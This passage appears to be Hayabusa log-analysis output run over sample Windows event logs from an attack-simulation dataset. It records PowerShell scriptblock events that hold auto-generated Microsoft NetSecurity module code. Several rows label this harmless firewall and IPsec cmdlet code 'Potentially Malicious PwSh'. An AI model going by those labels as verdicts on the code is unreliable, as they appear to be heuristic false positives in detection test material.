'In'; Value = $__cmdletization_defaultValue; IsValuePresent = 
$__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LogBlocked')) { [object]$__cmdletization_value = ${LogBlocked} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LogBlocked'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LogBlocked'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LogIgnored')) { [object]$__cmdletization_value = ${LogIgnored} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LogIgnored'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LogIgnored'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if 
($PSBoundParameters.ContainsKey('DisabledInterfaceAliases')) { [object]$__cmdletization_value = ${DisabledInterfaceAliases} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'DisabledInterfaceAliases'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'DisabledInterfaceAliases'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallProfile.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Set-NetFirewallProfile' -Alias '*'",rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server 
activation and config.evtx +2021-04-22 10:19:38.700 +00:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"dletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LogFileName')) { [object]$__cmdletization_value = ${LogFileName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LogFileName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LogFileName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LogMaxSizeKilobytes')) { [object]$__cmdletization_value = ${LogMaxSizeKilobytes} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LogMaxSizeKilobytes'; ParameterType = 'System.UInt64'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LogMaxSizeKilobytes'; ParameterType = 'System.UInt64'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LogAllowed')) { [object]$__cmdletization_value = ${LogAllowed} $__cmdletization_methodParameter = 
[Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LogAllowed'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LogAllowed'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LogBlocked')) { [object]$__cmdletization_value = ${LogBlocked} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LogBlocked'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LogBlocked'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LogIgnored')) { [object]$__cmdletization_value = ${LogIgnored} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LogIgnored'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { 
$__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LogIgnored'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DisabledInterfaceAliases')) { [object]$__cmdletization_value = ${DisabledInterfaceAliases} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'DisabledInterfaceAliases'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'DisabledInterfaceAliases'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not 
$__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallProfile.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Set-NetFirewallProfile' -Alias '*'",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.700 +00:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.701 +00:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.701 +00:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Get-NetFirewallProfile"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 
+2021-04-22 10:19:38.702 +00:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Set-NetFirewallProfile"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.733 +00:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"#requires -version 3.0 try { Microsoft.PowerShell.Core\Set-StrictMode -Off } catch { } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetSecDeltaCollection' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = [Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter] $script:PrivateData = [System.Collections.Generic.Dictionary[string,string]]::new() Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } }",rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service 
SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.733 +00:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"#requires -version 3.0 try { Microsoft.PowerShell.Core\Set-StrictMode -Off } catch { } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetSecDeltaCollection' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = [Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter] $script:PrivateData = [System.Collections.Generic.Dictionary[string,string]]::new() Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } }",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.740 +00:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.741 
+00:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.779 +00:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"#requires -version 3.0 try { Microsoft.PowerShell.Core\Set-StrictMode -Off } catch { } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetIPsecDoSPSetting' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = [Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter] $script:PrivateData = [System.Collections.Generic.Dictionary[string,string]]::new() Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function New-NetIPsecDospSetting { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] param( [Parameter(ParameterSetName='cim:CreateInstance0', Mandatory=$true)] [string] ${Name}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${StateIdleTimeoutSeconds}, 
[Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${PerIPRateLimitQueueIdleTimeoutSeconds}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${IpV6IPsecUnauthDscp}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${IpV6IPsecUnauthRateLimitBytesPerSec}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${IpV6IPsecUnauthPerIPRateLimitBytesPerSec}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint16] ${IpV6IPsecAuthDscp}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${IpV6IPsecAuthRateLimitBytesPerSec}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint16] ${IcmpV6Dscp}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${IcmpV6RateLimitBytesPerSec}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${IpV6FilterExemptDscp}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${IpV6FilterExemptRateLimitBytesPerSec}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint16] ${DefBlockExemptDscp}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${DefBlockExemptRateLimitBytesPerSec}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${MaxStateEntries}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${MaxPerIPRateLimitQueues}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DospKeyModules] ${EnabledKeyingModules}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DospFlags] ${FilteringFlags}, [Parameter(ParameterSetName='cim:CreateInstance0', Mandatory=$true)] [WildcardPattern[]] ${PublicInterfaceAliases}, [Parameter(ParameterSetName='cim:CreateInstance0', Mandatory=$true)] [WildcardPattern[]] ${PrivateInterfaceAliases}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${PublicV6Address}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${PrivateV6Address}, 
[Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='cim:CreateInstance0')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='cim:CreateInstance0')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Name')) { [object]$__cmdletization_value = ${Name} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } 
$__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('StateIdleTimeoutSeconds')) { [object]$__cmdletization_value = ${StateIdleTimeoutSeconds} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'StateIdleTimeoutSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'StateIdleTimeoutSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PerIPRateLimitQueueIdleTimeoutSeconds')) { [object]$__cmdletization_value = ${PerIPRateLimitQueueIdleTimeoutSeconds} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PerIPRateLimitQueueIdleTimeoutSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PerIPRateLimitQueueIdleTimeoutSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IpV6IPsecUnauthDscp')) { [object]$__cmdletization_value = ${IpV6IPsecUnauthDscp} $__cmdletization_methodParameter = 
[Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6IPsecUnauthDscp'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6IPsecUnauthDscp'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IpV6IPsecUnauthRateLimitBytesPerSec')) { [object]$__cmdletization_value = ${IpV6IPsecUnauthRateLimitBytesPerSec} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6IPsecUnauthRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6IPsecUnauthRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IpV6IPsecUnauthPerIPRateLimitBytesPerSec')) { [object]$__cmdletization_value = ${IpV6IPsecUnauthPerIPRateLimitBytesPerSec} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6IPsecUnauthPerIPRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = 
[Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6IPsecUnauthPerIPRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IpV6IPsecAuthDscp')) { [object]$__cmdletization_value = ${IpV6IPsecAuth",rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.779 +00:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"#requires -version 3.0 try { Microsoft.PowerShell.Core\Set-StrictMode -Off } catch { } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetIPsecDoSPSetting' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = [Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter] $script:PrivateData = [System.Collections.Generic.Dictionary[string,string]]::new() Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = 
$myPSBoundParameters['AsJob'] } } function New-NetIPsecDospSetting { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] param( [Parameter(ParameterSetName='cim:CreateInstance0', Mandatory=$true)] [string] ${Name}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${StateIdleTimeoutSeconds}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${PerIPRateLimitQueueIdleTimeoutSeconds}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${IpV6IPsecUnauthDscp}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${IpV6IPsecUnauthRateLimitBytesPerSec}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${IpV6IPsecUnauthPerIPRateLimitBytesPerSec}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint16] ${IpV6IPsecAuthDscp}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${IpV6IPsecAuthRateLimitBytesPerSec}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint16] ${IcmpV6Dscp}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${IcmpV6RateLimitBytesPerSec}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${IpV6FilterExemptDscp}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${IpV6FilterExemptRateLimitBytesPerSec}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint16] ${DefBlockExemptDscp}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${DefBlockExemptRateLimitBytesPerSec}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${MaxStateEntries}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${MaxPerIPRateLimitQueues}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DospKeyModules] ${EnabledKeyingModules}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DospFlags] ${FilteringFlags}, [Parameter(ParameterSetName='cim:CreateInstance0', 
